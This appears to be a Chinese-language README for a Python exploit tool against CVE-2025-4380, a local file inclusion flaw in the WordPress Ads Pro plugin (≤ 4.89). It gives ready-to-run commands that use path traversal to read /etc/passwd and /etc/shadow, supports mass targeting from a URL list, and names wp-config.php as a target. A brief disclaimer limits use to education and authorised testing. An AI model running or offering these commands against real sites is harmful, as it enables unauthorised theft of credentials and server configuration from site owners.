此 Python 利用工具针对 WordPress 的 Ads Pro 插件 ≤ 4.89,该插件存在通过 bsa_preview_callback AJAX 操作的 本地文件包含 (LFI) 漏洞。
未认证的攻击者可利用此漏洞读取服务器文件系统中的任意文件,包括敏感文件,如 /etc/passwd、wp-config.php 等。
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd
python3 cve_2025_4380.py -l targets.txt -p ../../../../etc/shadow
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd -o output.txt
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd --proxy http://127.0.0.1:8080
Burpsuite 请求/响应
CVE-2025-4380
Ads Pro 插件 <= 4.89 - 通过 bsa_preview_callback 中的 bsa_template 导致的本地文件包含
此利用工具仅用于教育目的和授权的安全测试。
| 参数 | 描述 | 必填 |
|---|
-u, --url | 目标 URL(例如 http://target.com) | 可选 |
-l, --list | 包含目标 URL 列表的文件 | 可选 |
-p, --path | 要包含的文件路径(例如 ../../etc/passwd) | 是 |
-o, --output | 保存结果的输出文件 | 可选 |
--proxy | 代理(例如 http://127.0.0.1:8080) | 可选 |